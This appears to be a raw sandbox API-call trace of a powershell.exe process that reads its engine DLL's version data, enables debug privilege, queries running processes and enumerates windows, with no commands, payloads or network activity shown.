	[0539.292] GetFileAttributesExW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll" (normalized: "c:\\windows\\assembly\\gac_msil\\system.management.automation\\1.0.0.0__31bf3856ad364e35\\system.management.automation.dll"), fInfoLevelId=0x0, lpFileInformation=0x10deb0 | out: lpFileInformation=0x10deb0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa85ac0a8, ftCreationTime.dwHighDateTime=0x1cb892b, ftLastAccessTime.dwLowDateTime=0xa85ac0a8, ftLastAccessTime.dwHighDateTime=0x1cb892b, ftLastWriteTime.dwLowDateTime=0xa85d2208, ftLastWriteTime.dwHighDateTime=0x1cb892b, nFileSizeHigh=0x0, nFileSizeLow=0x2df000)) returned 1
	[0539.293] SetErrorMode (uMode=0x1) returned 0x1
	[0540.326] GetFileVersionInfoSizeW (in: lptstrFilename="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpdwHandle=0x10e120 | out: lpdwHandle=0x10e120) returned 0x94c
	[0540.327] GetFileVersionInfoW (in: lptstrFilename="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", dwHandle=0x0, dwLen=0x94c, lpData=0x2a772d8 | out: lpData=0x2a772d8) returned 1
	[0540.330] VerQueryValueW (in: pBlock=0x2a772d8, lpSubBlock="\\VarFileInfo\\Translation", lplpBuffer=0x10e098, puLen=0x10e090 | out: lplpBuffer=0x10e098*=0x2a77374, puLen=0x10e090) returned 1
	[0540.332] lstrlenW (lpString="䅁") returned 1
	[0540.340] VerQueryValueW (in: pBlock=0x2a772d8, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\CompanyName", lplpBuffer=0x10e008, puLen=0x10e000 | out: lplpBuffer=0x10e008*=0x2a77450, puLen=0x10e000) returned 1
	[0540.341] lstrlenW (lpString="Microsoft Corporation") returned 21
	[0540.343] CoTaskMemAlloc (cb=0x2e) returned 0x2f3080
	[0540.343] lstrcpyW (in: lpString1=0x2f3080, lpString2="Microsoft Corporation" | out: lpString1="Microsoft Corporation") returned="Microsoft Corporation"
	[0540.344] CoTaskMemFree (pv=0x2f3080) 
	[0540.344] VerQueryValueW (in: pBlock=0x2a772d8, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\FileDescription", lplpBuffer=0x10e008, puLen=0x10e000 | out: lplpBuffer=0x10e008*=0x2a774a4, puLen=0x10e000) returned 1
	[0540.344] lstrlenW (lpString="System.Management.Automation") returned 28
	[0540.344] CoTaskMemAlloc (cb=0x3c) returned 0x229860
	[0540.345] lstrcpyW (in: lpString1=0x229860, lpString2="System.Management.Automation" | out: lpString1="System.Management.Automation") returned="System.Management.Automation"
	[0540.345] CoTaskMemFree (pv=0x229860) 
	[0540.345] VerQueryValueW (in: pBlock=0x2a772d8, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\FileVersion", lplpBuffer=0x10e008, puLen=0x10e000 | out: lplpBuffer=0x10e008*=0x2a77500, puLen=0x10e000) returned 1
	[0540.345] lstrlenW (lpString="6.1.7601.17514") returned 14
	[0540.345] CoTaskMemAlloc (cb=0x20) returned 0x2ed2d0
	[0540.345] lstrcpyW (in: lpString1=0x2ed2d0, lpString2="6.1.7601.17514" | out: lpString1="6.1.7601.17514") returned="6.1.7601.17514"
	[0540.345] CoTaskMemFree (pv=0x2ed2d0) 
	[0540.345] VerQueryValueW (in: pBlock=0x2a772d8, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\InternalName", lplpBuffer=0x10e008, puLen=0x10e000 | out: lplpBuffer=0x10e008*=0x2a77540, puLen=0x10e000) returned 1
	[0540.345] lstrlenW (lpString="System.Management.Automation.dll") returned 32
	[0540.345] CoTaskMemAlloc (cb=0x44) returned 0x229860
	[0540.345] lstrcpyW (in: lpString1=0x229860, lpString2="System.Management.Automation.dll" | out: lpString1="System.Management.Automation.dll") returned="System.Management.Automation.dll"
	[0540.345] CoTaskMemFree (pv=0x229860) 
	[0540.345] VerQueryValueW (in: pBlock=0x2a772d8, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\LegalCopyright", lplpBuffer=0x10e008, puLen=0x10e000 | out: lplpBuffer=0x10e008*=0x2a775a8, puLen=0x10e000) returned 1
	[0540.345] lstrlenW (lpString="Copyright (c) Microsoft Corporation. All rights reserved.") returned 57
	[0540.345] CoTaskMemAlloc (cb=0x76) returned 0x28f9e0
	[0540.345] lstrcpyW (in: lpString1=0x28f9e0, lpString2="Copyright (c) Microsoft Corporation. All rights reserved." | out: lpString1="Copyright (c) Microsoft Corporation. All rights reserved.") returned="Copyright (c) Microsoft Corporation. All rights reserved."
	[0540.345] CoTaskMemFree (pv=0x28f9e0) 
	[0540.345] VerQueryValueW (in: pBlock=0x2a772d8, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\OriginalFilename", lplpBuffer=0x10e008, puLen=0x10e000 | out: lplpBuffer=0x10e008*=0x2a77644, puLen=0x10e000) returned 1
	[0540.345] lstrlenW (lpString="System.Management.Automation.dll") returned 32
	[0540.346] CoTaskMemAlloc (cb=0x44) returned 0x229860
	[0540.346] lstrcpyW (in: lpString1=0x229860, lpString2="System.Management.Automation.dll" | out: lpString1="System.Management.Automation.dll") returned="System.Management.Automation.dll"
	[0540.346] CoTaskMemFree (pv=0x229860) 
	[0540.346] VerQueryValueW (in: pBlock=0x2a772d8, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\ProductName", lplpBuffer=0x10e008, puLen=0x10e000 | out: lplpBuffer=0x10e008*=0x2a776a8, puLen=0x10e000) returned 1
	[0540.346] lstrlenW (lpString="Microsoft (R) Windows (R) Operating System") returned 42
	[0540.346] CoTaskMemAlloc (cb=0x58) returned 0x2b07d0
	[0540.346] lstrcpyW (in: lpString1=0x2b07d0, lpString2="Microsoft (R) Windows (R) Operating System" | out: lpString1="Microsoft (R) Windows (R) Operating System") returned="Microsoft (R) Windows (R) Operating System"
	[0540.346] CoTaskMemFree (pv=0x2b07d0) 
	[0540.346] VerQueryValueW (in: pBlock=0x2a772d8, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\ProductVersion", lplpBuffer=0x10e008, puLen=0x10e000 | out: lplpBuffer=0x10e008*=0x2a77724, puLen=0x10e000) returned 1
	[0540.346] lstrlenW (lpString="6.1.7601.17514") returned 14
	[0540.346] CoTaskMemAlloc (cb=0x20) returned 0x2ed2d0
	[0540.346] lstrcpyW (in: lpString1=0x2ed2d0, lpString2="6.1.7601.17514" | out: lpString1="6.1.7601.17514") returned="6.1.7601.17514"
	[0540.346] CoTaskMemFree (pv=0x2ed2d0) 
	[0540.346] VerQueryValueW (in: pBlock=0x2a772d8, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\Comments", lplpBuffer=0x10e008, puLen=0x10e000 | out: lplpBuffer=0x10e008*=0x2a773cc, puLen=0x10e000) returned 1
	[0540.346] lstrlenW (lpString="Microsoft Windows PowerShell Engine Core Assembly") returned 49
	[0540.346] CoTaskMemAlloc (cb=0x66) returned 0x2e7b30
	[0540.346] lstrcpyW (in: lpString1=0x2e7b30, lpString2="Microsoft Windows PowerShell Engine Core Assembly" | out: lpString1="Microsoft Windows PowerShell Engine Core Assembly") returned="Microsoft Windows PowerShell Engine Core Assembly"
	[0540.346] CoTaskMemFree (pv=0x2e7b30) 
	[0540.346] VerQueryValueW (in: pBlock=0x2a772d8, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\LegalTrademarks", lplpBuffer=0x10e008, puLen=0x10e000 | out: lplpBuffer=0x10e008*=0x0, puLen=0x10e000) returned 0
	[0540.346] VerQueryValueW (in: pBlock=0x2a772d8, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\PrivateBuild", lplpBuffer=0x10e008, puLen=0x10e000 | out: lplpBuffer=0x10e008*=0x0, puLen=0x10e000) returned 0
	[0540.347] VerQueryValueW (in: pBlock=0x2a772d8, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\SpecialBuild", lplpBuffer=0x10e008, puLen=0x10e000 | out: lplpBuffer=0x10e008*=0x0, puLen=0x10e000) returned 0
	[0540.347] VerQueryValueW (in: pBlock=0x2a772d8, lpSubBlock="\\VarFileInfo\\Translation", lplpBuffer=0x10dfd8, puLen=0x10dfd0 | out: lplpBuffer=0x10dfd8*=0x2a77374, puLen=0x10dfd0) returned 1
	[0540.348] CoTaskMemAlloc (cb=0x204) returned 0x2923f0
	[0540.348] VerLanguageNameW (in: wLang=0x0, szLang=0x2923f0, cchLang=0x100 | out: szLang="Language Neutral") returned 0x10
	[0540.349] CoTaskMemFree (pv=0x2923f0) 
	[0540.349] VerQueryValueW (in: pBlock=0x2a772d8, lpSubBlock="\\", lplpBuffer=0x10e028, puLen=0x10e020 | out: lplpBuffer=0x10e028*=0x2a77300, puLen=0x10e020) returned 1
	[0540.355] GetCurrentProcessId () returned 0x1394
	[0541.371] LookupPrivilegeValueW (in: lpSystemName=0x0, lpName="SeDebugPrivilege", lpLuid=0x10cf50 | out: lpLuid=0x10cf50*(LowPart=0x14, HighPart=0)) returned 1
	[0541.374] GetCurrentProcess () returned 0xffffffffffffffff
	[0541.374] OpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x20, TokenHandle=0x10cf70 | out: TokenHandle=0x10cf70*=0x2e0) returned 1
	[0541.375] AdjustTokenPrivileges (in: TokenHandle=0x2e0, DisableAllPrivileges=0, NewState=0x2a7ab50*(PrivilegesCount=0x1, Privileges=((Luid.LowPart=0x14, Luid.HighPart=0, Attributes=0x2))), BufferLength=0x0, PreviousState=0x0, ReturnLength=0x0 | out: PreviousState=0x0, ReturnLength=0x0) returned 1
	[0541.377] CloseHandle (hObject=0x2e0) returned 1
	[0541.380] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x1394) returned 0x2e0
	[0541.389] EnumProcessModules (in: hProcess=0x2e0, lphModule=0x2a7abb8, cb=0x200, lpcbNeeded=0x10df88 | out: lphModule=0x2a7abb8, lpcbNeeded=0x10df88) returned 1
	[0541.392] GetModuleInformation (in: hProcess=0x2e0, hModule=0x13f370000, lpmodinfo=0x2a7ae28, cb=0x18 | out: lpmodinfo=0x2a7ae28*(lpBaseOfDll=0x13f370000, SizeOfImage=0x77000, EntryPoint=0x13f37c63c)) returned 1
	[0541.393] CoTaskMemAlloc (cb=0x804) returned 0x2f90b0
	[0541.393] GetModuleBaseNameW (in: hProcess=0x2e0, hModule=0x13f370000, lpBaseName=0x2f90b0, nSize=0x800 | out: lpBaseName="powershell.exe") returned 0xe
	[0541.393] CoTaskMemFree (pv=0x2f90b0) 
	[0541.394] CoTaskMemAlloc (cb=0x804) returned 0x2f90b0
	[0541.394] GetModuleFileNameExW (in: hProcess=0x2e0, hModule=0x13f370000, lpFilename=0x2f90b0, nSize=0x800 | out: lpFilename="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\powershell.exe")) returned 0x39
	[0541.394] CoTaskMemFree (pv=0x2f90b0) 
	[0541.395] CloseHandle (hObject=0x2e0) returned 1
	[0541.403] OpenProcess (dwDesiredAccess=0x1f0fff, bInheritHandle=0, dwProcessId=0x1394) returned 0x2e0
	[0541.404] GetExitCodeProcess (in: hProcess=0x2e0, lpExitCode=0x10e0b8 | out: lpExitCode=0x10e0b8*=0x103) returned 1
	[0541.412] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x12a7b088, Length=0x20000, ResultLength=0x10e080 | out: SystemInformation=0x12a7b088, ResultLength=0x10e080*=0x32810) returned 0xc0000004
	[0541.415] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x12a9b0b8, Length=0x35010, ResultLength=0x10e080 | out: SystemInformation=0x12a9b0b8, ResultLength=0x10e080*=0x329d0) returned 0x0
	[0542.278] EnumWindows (lpEnumFunc=0x1e666ac, lParam=0x0) 
	[0543.789] GetWindowThreadProcessId (in: hWnd=0x10090, lpdwProcessId=0x10dde0 | out: lpdwProcessId=0x10dde0) returned 0x4d0
	[0549.327] GetWindowThreadProcessId (in: hWnd=0x3013e, lpdwProcessId=0x10dde0 | out: lpdwProcessId=0x10dde0) returned 0x558
	[0550.279] GetWindowThreadProcessId (in: hWnd=0x201ba, lpdwProcessId=0x10dde0 | out: lpdwProcessId=0x10dde0) returned 0x4d0
	[0550.279] GetWindowThreadProcessId (in: hWnd=0x300fe, lpdwProcessId=0x10dde0 | out: lpdwProcessId=0x10dde0) returned 0x4d0
	[0550.280] GetWindowThreadProcessId (in: hWnd=0x400ae, lpdwProcessId=0x10dde0 | out: lpdwProcessId=0x10dde0) returned 0x4d0
	[0550.280] GetWindowThreadProcessId (in: hWnd=0x10146, lpdwProcessId=0x10dde0 | out: lpdwProcessId=0x10dde0) returned 0x538
	[0550.280] GetWindowThreadProcessId (in: hWnd=0x20118, lpdwProcessId=0x10dde0 | out: lpdwProcessId=0x10dde0) returned 0x4d0
	[0550.280] GetWindowThreadProcessId (in: hWnd=0x2001e, lpdwProcessId=0x10dde0 | out: lpdwProcessId=0x10dde0) returned 0x778
	[0550.280] GetWindowThreadProcessId (in: hWnd=0x20028, lpdwProcessId=0x10dde0 | out: lpdwProcessId=0x10dde0) returned 0x778
	[0550.280] GetWindowThreadProcessId (in: hWnd=0x1007c, lpdwProcessId=0x10dde0 | out: lpdwProcessId=0x10dde0) returned 0x4d0
	[0550.280] GetWindowThreadProcessId (in: hWnd=0x1007a, lpdwProcessId=0x10dde0 | out: lpdwProcessId=0x10dde0) returned 0x4d0
	[0550.280] GetWindowThreadProcessId (in: hWnd=0x10066, lpdwProcessId=0x10dde0 | out: lpdwProcessId=0x10dde0) returned 0x4d0
	[0550.281] GetWindowThreadProcessId (in: hWnd=0x10084, lpdwProcessId=0x10dde0 | out: lpdwProcessId=0x10dde0) returned 0x4d0
	[0550.281] GetWindowThreadProcessId (in: hWnd=0x10082, lpdwProcessId=0x10dde0 | out: lpdwProcessId=0x10dde0) returned 0x4d0
	[0550.281] GetWindowThreadProcessId (in: hWnd=0x1007e, lpdwProcessId=0x10dde0 | out: lpdwProcessId=0x10dde0) returned 0x4d0
	[0550.281] GetWindowThreadProcessId (in: hWnd=0x1005e, lpdwProcessId=0x10dde0 | out: lpdwProcessId=0x10dde0) returned 0x4d0
	[0550.281] GetWindowThreadProcessId (in: hWnd=0x10056, lpdwProcessId=0x10dde0 | out: lpdwProcessId=0x10dde0) returned 0x4d0
	[0550.281] GetWindowThreadProcessId (in: hWnd=0x100fa, lpdwProcessId=0x10dde0 | out: lpdwProcessId=0x10dde0) returned 0x460
	[0550.281] GetWindowThreadProcessId (in: hWnd=0x500a2, lpdwProcessId=0x10dde0 | out: lpdwProcessId=0x10dde0) returned 0x4d0
	[0550.282] GetWindowThreadProcessId (in: hWnd=0x10092, lpdwProcessId=0x10dde0 | out: lpdwProcessId=0x10dde0) returned 0x4d0
	[0550.282] GetWindowThreadProcessId (in: hWnd=0x10836, lpdwProcessId=0x10dde0 | out: lpdwProcessId=0x10dde0) returned 0x1944
	[0550.282] GetWindowThreadProcessId (in: hWnd=0x10826, lpdwProcessId=0x10dde0 | out: lpdwProcessId=0x10dde0) returned 0x18c8
	[0550.282] GetWindowThreadProcessId (in: hWnd=0x10822, lpdwProcessId=0x10dde0 | out: lpdwProcessId=0x10dde0) returned 0x18ac
	[0550.282] GetWindowThreadProcessId (in: hWnd=0x1081e, lpdwProcessId=0x10dde0 | out: lpdwProcessId=0x10dde0) returned 0x18ec
	[0550.282] GetWindowThreadProcessId (in: hWnd=0x1081a, lpdwProcessId=0x10dde0 | out: lpdwProcessId=0x10dde0) returned 0x1898
	[0550.282] GetWindowThreadProcessId (in: hWnd=0x10810, lpdwProcessId=0x10dde0 | out: lpdwProcessId=0x10dde0) returned 0xc98
	[0550.282] GetWindowThreadProcessId (in: hWnd=0x1080a, lpdwProcessId=0x10dde0 | out: lpdwProcessId=0x10dde0) returned 0x153c
	[0550.283] GetWindowThreadProcessId (in: hWnd=0x10806, lpdwProcessId=0x10dde0 | out: lpdwProcessId=0x10dde0) returned 0x1808
	[0550.283] GetWindowThreadProcessId (in: hWnd=0x10790, lpdwProcessId=0x10dde0 | out: lpdwProcessId=0x10dde0) returned 0x12a4
	[0550.283] GetWindowThreadProcessId (in: hWnd=0x1078e, lpdwProcessId=0x10dde0 | out: lpdwProcessId=0x10dde0) returned 0x1740
	[0550.283] GetWindowThreadProcessId (in: hWnd=0x10784, lpdwProcessId=0x10dde0 | out: lpdwProcessId=0x10dde0) returned 0x16c4
	[0550.283] GetWindowThreadProcessId (in: hWnd=0x107c2, lpdwProcessId=0x10dde0 | out: lpdwProcessId=0x10dde0) returned 0x1820
	[0550.283] GetWindowThreadProcessId (in: hWnd=0x107b4, lpdwProcessId=0x10dde0 | out: lpdwProcessId=0x10dde0) returned 0x16ac
	[0550.283] GetWindowThreadProcessId (in: hWnd=0x1079a, lpdwProcessId=0x10dde0 | out: lpdwProcessId=0x10dde0) returned 0x1858
	[0550.283] GetWindowThreadProcessId (in: hWnd=0x1077e, lpdwProcessId=0x10dde0 | out: lpdwProcessId=0x10dde0) returned 0x1664
	[0550.283] GetWindowThreadProcessId (in: hWnd=0x10778, lpdwProcessId=0x10dde0 | out: lpdwProcessId=0x10dde0) returned 0x10b4
	[0550.283] GetWindowThreadProcessId (in: hWnd=0x10774, lpdwProcessId=0x10dde0 | out: lpdwProcessId=0x10dde0) returned 0x10ac
	[0550.284] GetWindowThreadProcessId (in: hWnd=0x20378, lpdwProcessId=0x10dde0 | out: lpdwProcessId=0x10dde0) returned 0x10ec
	[0550.284] GetWindowThreadProcessId (in: hWnd=0x10766, lpdwProcessId=0x10dde0 | out: lpdwProcessId=0x10dde0) returned 0x1068
	[0550.284] GetWindowThreadProcessId (in: hWnd=0x10762, lpdwProcessId=0x10dde0 | out: lpdwProcessId=0x10dde0) returned 0x17e0
	[0550.284] GetWindowThreadProcessId (in: hWnd=0x1075e, lpdwProcessId=0x10dde0 | out: lpdwProcessId=0x10dde0) returned 0x102c
	[0550.284] GetWindowThreadProcessId (in: hWnd=0x1075a, lpdwProcessId=0x10dde0 | out: lpdwProcessId=0x10dde0) returned 0x17a4
	[0550.284] GetWindowThreadProcessId (in: hWnd=0x2035a, lpdwProcessId=0x10dde0 | out: lpdwProcessId=0x10dde0) returned 0x1050
	[0550.284] GetWindowThreadProcessId (in: hWnd=0x1072c, lpdwProcessId=0x10dde0 | out: lpdwProcessId=0x10dde0) returned 0x1694
	[0550.284] GetWindowThreadProcessId (in: hWnd=0x1071e, lpdwProcessId=0x10dde0 | out: lpdwProcessId=0x10dde0) returned 0x1770
	[0550.284] GetWindowThreadProcessId (in: hWnd=0x10710, lpdwProcessId=0x10dde0 | out: lpdwProcessId=0x10dde0) returned 0x1720
	[0550.284] GetWindowThreadProcessId (in: hWnd=0x10702, lpdwProcessId=0x10dde0 | out: lpdwProcessId=0x10dde0) returned 0x165c
	[0550.285] GetWindowThreadProcessId (in: hWnd=0x106ca, lpdwProcessId=0x10dde0 | out: lpdwProcessId=0x10dde0) returned 0x1578
	[0550.285] GetWindowThreadProcessId (in: hWnd=0x204a6, lpdwProcessId=0x10dde0 | out: lpdwProcessId=0x10dde0) returned 0x16c0
	[0550.285] GetWindowThreadProcessId (in: hWnd=0x106c4, lpdwProcessId=0x10dde0 | out: lpdwProcessId=0x10dde0) returned 0x161c
	[0550.285] GetWindowThreadProcessId (in: hWnd=0x106c0, lpdwProcessId=0x10dde0 | out: lpdwProcessId=0x10dde0) returned 0x1638
	[0550.285] GetWindowThreadProcessId (in: hWnd=0x20362, lpdwProcessId=0x10dde0 | out: lpdwProcessId=0x10dde0) returned 0x15c8
	[0550.285] GetWindowThreadProcessId (in: hWnd=0x106be, lpdwProcessId=0x10dde0 | out: lpdwProcessId=0x10dde0) returned 0x1554
	[0550.285] GetWindowThreadProcessId (in: hWnd=0x106bc, lpdwProcessId=0x10dde0 | out: lpdwProcessId=0x10dde0) returned 0x1674
	[0550.285] GetWindowThreadProcessId (in: hWnd=0x106b4, lpdwProcessId=0x10dde0 | out: lpdwProcessId=0x10dde0) returned 0x1520
	[0550.285] GetWindowThreadProcessId (in: hWnd=0x1068e, lpdwProcessId=0x10dde0 | out: lpdwProcessId=0x10dde0) returned 0x14bc
	[0550.285] GetWindowThreadProcessId (in: hWnd=0x1067e, lpdwProcessId=0x10dde0 | out: lpdwProcessId=0x10dde0) returned 0xf8c
	[0550.285] GetWindowThreadProcessId (in: hWnd=0x1066e, lpdwProcessId=0x10dde0 | out: lpdwProcessId=0x10dde0) returned 0xe9c
	[0550.286] GetWindowThreadProcessId (in: hWnd=0x1065e, lpdwProcessId=0x10dde0 | out: lpdwProcessId=0x10dde0) returned 0x1434
	[0550.286] GetWindowThreadProcessId (in: hWnd=0x1064e, lpdwProcessId=0x10dde0 | out: lpdwProcessId=0x10dde0) returned 0x14ec
	[0550.286] GetWindowThreadProcessId (in: hWnd=0x1063e, lpdwProcessId=0x10dde0 | out: lpdwProcessId=0x10dde0) returned 0xfcc
	[0550.286] GetWindowThreadProcessId (in: hWnd=0x1062e, lpdwProcessId=0x10dde0 | out: lpdwProcessId=0x10dde0) returned 0x12ac
	[0550.286] GetWindowThreadProcessId (in: hWnd=0x1062a, lpdwProcessId=0x10dde0 | out: lpdwProcessId=0x10dde0) returned 0x1484
	[0550.286] GetWindowThreadProcessId (in: hWnd=0x10626, lpdwProcessId=0x10dde0 | out: lpdwProcessId=0x10dde0) returned 0x934
	[0550.286] GetWindowThreadProcessId (in: hWnd=0x10622, lpdwProcessId=0x10dde0 | out: lpdwProcessId=0x10dde0) returned 0xc0c
	[0550.286] GetWindowThreadProcessId (in: hWnd=0x1061c, lpdwProcessId=0x10dde0 | out: lpdwProcessId=0x10dde0) returned 0xb08
	[0550.286] GetWindowThreadProcessId (in: hWnd=0x10610, lpdwProcessId=0x10dde0 | out: lpdwProcessId=0x10dde0) returned 0x948
	[0550.286] GetWindowThreadProcessId (in: hWnd=0x1060c, lpdwProcessId=0x10dde0 | out: lpdwProcessId=0x10dde0) returned 0x1178
	[0550.286] GetWindowThreadProcessId (in: hWnd=0x105fa, lpdwProcessId=0x10dde0 | out: lpdwProcessId=0x10dde0) returned 0x13e0
	[0550.287] GetWindowThreadProcessId (in: hWnd=0x105ea, lpdwProcessId=0x10dde0 | out: lpdwProcessId=0x10dde0) returned 0xcd0
	[0550.287] GetWindowThreadProcessId (in: hWnd=0x105da, lpdwProcessId=0x10dde0 | out: lpdwProcessId=0x10dde0) returned 0x13fc
	[0550.287] GetWindowThreadProcessId (in: hWnd=0x105c6, lpdwProcessId=0x10dde0 | out: lpdwProcessId=0x10dde0) returned 0xdc8
	[0550.287] GetWindowThreadProcessId (in: hWnd=0x105b6, lpdwProcessId=0x10dde0 | out: lpdwProcessId=0x10dde0) returned 0xc18
	[0550.287] GetWindowThreadProcessId (in: hWnd=0x105a6, lpdwProcessId=0x10dde0 | out: lpdwProcessId=0x10dde0) returned 0xc2c
	[0550.287] GetWindowThreadProcessId (in: hWnd=0x10580, lpdwProcessId=0x10dde0 | out: lpdwProcessId=0x10dde0) returned 0xa1c
	[0550.287] GetWindowThreadProcessId (in: hWnd=0x10578, lpdwProcessId=0x10dde0 | out: lpdwProcessId=0x10dde0) returned 0x1244
	[0550.287] GetWindowThreadProcessId (in: hWnd=0x10574, lpdwProcessId=0x10dde0 | out: lpdwProcessId=0x10dde0) returned 0xdb0
	[0550.287] GetWindowThreadProcessId (in: hWnd=0x20356, lpdwProcessId=0x10dde0 | out: lpdwProcessId=0x10dde0) returned 0x1398
	[0550.288] GetWindow (hWnd=0x20356, uCmd=0x4) returned 0x0
	[0550.289] IsWindowVisible (hWnd=0x20356) returned 0
	[0550.289] GetWindowThreadProcessId (in: hWnd=0x10566, lpdwProcessId=0x10dde0 | out: lpdwProcessId=0x10dde0) returned 0x1358
	[0550.289] GetWindowThreadProcessId (in: hWnd=0x10562, lpdwProcessId=0x10dde0 | out: lpdwProcessId=0x10dde0) returned 0x1370
	[0550.289] GetWindowThreadProcessId (in: hWnd=0x1055e, lpdwProcessId=0x10dde0 | out: lpdwProcessId=0x10dde0) returned 0x1340
	[0550.289] GetWindowThreadProcessId (in: hWnd=0x10558, lpdwProcessId=0x10dde0 | out: lpdwProcessId=0x10dde0) returned 0x130c
	[0550.289] GetWindowThreadProcessId (in: hWnd=0x10550, lpdwProcessId=0x10dde0 | out: lpdwProcessId=0x10dde0) returned 0x12c0
	[0550.289] GetWindowThreadProcessId (in: hWnd=0x2053a, lpdwProcessId=0x10dde0 | out: lpdwProcessId=0x10dde0) returned 0x12e4
	[0550.289] GetWindowThreadProcessId (in: hWnd=0x1051a, lpdwProcessId=0x10dde0 | out: lpdwProcessId=0x10dde0) returned 0x1270
	[0550.290] GetWindowThreadProcessId (in: hWnd=0x1050a, lpdwProcessId=0x10dde0 | out: lpdwProcessId=0x10dde0) returned 0x1298
	[0550.290] GetWindowThreadProcessId (in: hWnd=0x104fa, lpdwProcessId=0x10dde0 | out: lpdwProcessId=0x10dde0) returned 0x120c
	[0550.290] GetWindowThreadProcessId (in: hWnd=0x204d6, lpdwProcessId=0x10dde0 | out: lpdwProcessId=0x10dde0) returned 0x122c
	[0550.290] GetWindowThreadProcessId (in: hWnd=0x104ce, lpdwProcessId=0x10dde0 | out: lpdwProcessId=0x10dde0) returned 0x11c4
	[0550.290] GetWindowThreadProcessId (in: hWnd=0x202d6, lpdwProcessId=0x10dde0 | out: lpdwProcessId=0x10dde0) returned 0x11b0
	[0550.290] GetWindowThreadProcessId (in: hWnd=0x104c8, lpdwProcessId=0x10dde0 | out: lpdwProcessId=0x10dde0) returned 0x1188
	[0550.290] GetWindowThreadProcessId (in: hWnd=0x104c4, lpdwProcessId=0x10dde0 | out: lpdwProcessId=0x10dde0) returned 0x1148
	[0550.290] GetWindowThreadProcessId (in: hWnd=0x202e6, lpdwProcessId=0x10dde0 | out: lpdwProcessId=0x10dde0) returned 0x1160
	[0550.290] GetWindowThreadProcessId (in: hWnd=0x30272, lpdwProcessId=0x10dde0 | out: lpdwProcessId=0x10dde0) returned 0x10fc
	[0550.290] GetWindowThreadProcessId (in: hWnd=0x104bc, lpdwProcessId=0x10dde0 | out: lpdwProcessId=0x10dde0) returned 0xe34
	[0550.291] GetWindowThreadProcessId (in: hWnd=0x104ac, lpdwProcessId=0x10dde0 | out: lpdwProcessId=0x10dde0) returned 0xea4
	[0550.291] GetWindowThreadProcessId (in: hWnd=0x1048e, lpdwProcessId=0x10dde0 | out: lpdwProcessId=0x10dde0) returned 0x514
	[0550.291] GetWindowThreadProcessId (in: hWnd=0x1047e, lpdwProcessId=0x10dde0 | out: lpdwProcessId=0x10dde0) returned 0xe48
	[0550.291] GetWindowThreadProcessId (in: hWnd=0x1046e, lpdwProcessId=0x10dde0 | out: lpdwProcessId=0x10dde0) returned 0xbc8
	[0550.291] GetWindowThreadProcessId (in: hWnd=0x1045e, lpdwProcessId=0x10dde0 | out: lpdwProcessId=0x10dde0) returned 0xdf8
	[0550.291] GetWindowThreadProcessId (in: hWnd=0x1044c, lpdwProcessId=0x10dde0 | out: lpdwProcessId=0x10dde0) returned 0x318
	[0550.291] GetWindowThreadProcessId (in: hWnd=0x10440, lpdwProcessId=0x10dde0 | out: lpdwProcessId=0x10dde0) returned 0xcac
	[0550.291] GetWindowThreadProcessId (in: hWnd=0x10438, lpdwProcessId=0x10dde0 | out: lpdwProcessId=0x10dde0) returned 0x8bc
	[0550.291] GetWindowThreadProcessId (in: hWnd=0x10434, lpdwProcessId=0x10dde0 | out: lpdwProcessId=0x10dde0) returned 0xf9c
	[0550.291] GetWindowThreadProcessId (in: hWnd=0x10430, lpdwProcessId=0x10dde0 | out: lpdwProcessId=0x10dde0) returned 0xf48
	[0550.291] GetWindowThreadProcessId (in: hWnd=0x10414, lpdwProcessId=0x10dde0 | out: lpdwProcessId=0x10dde0) returned 0xe40
	[0550.292] GetWindowThreadProcessId (in: hWnd=0x10410, lpdwProcessId=0x10dde0 | out: lpdwProcessId=0x10dde0) returned 0xecc
	[0550.292] GetWindowThreadProcessId (in: hWnd=0x1040c, lpdwProcessId=0x10dde0 | out: lpdwProcessId=0x10dde0) returned 0xeb8
	[0550.292] GetWindowThreadProcessId (in: hWnd=0x10408, lpdwProcessId=0x10dde0 | out: lpdwProcessId=0x10dde0) returned 0xe80
	[0550.292] GetWindowThreadProcessId (in: hWnd=0x10404, lpdwProcessId=0x10dde0 | out: lpdwProcessId=0x10dde0) returned 0xe98
	[0550.292] GetWindowThreadProcessId (in: hWnd=0x10400, lpdwProcessId=0x10dde0 | out: lpdwProcessId=0x10dde0) returned 0xe60
	[0550.292] GetWindowThreadProcessId (in: hWnd=0x103fc, lpdwProcessId=0x10dde0 | out: lpdwProcessId=0x10dde0) returned 0xee4
	[0550.292] GetWindowThreadProcessId (in: hWnd=0x103ee, lpdwProcessId=0x10dde0 | out: lpdwProcessId=0x10dde0) returned 0xf00
	[0550.292] GetWindowThreadProcessId (in: hWnd=0x10398, lpdwProcessId=0x10dde0 | out: lpdwProcessId=0x10dde0) returned 0xdf0
	[0550.292] GetWindowThreadProcessId (in: hWnd=0x10388, lpdwProcessId=0x10dde0 | out: lpdwProcessId=0x10dde0) returned 0xe1c
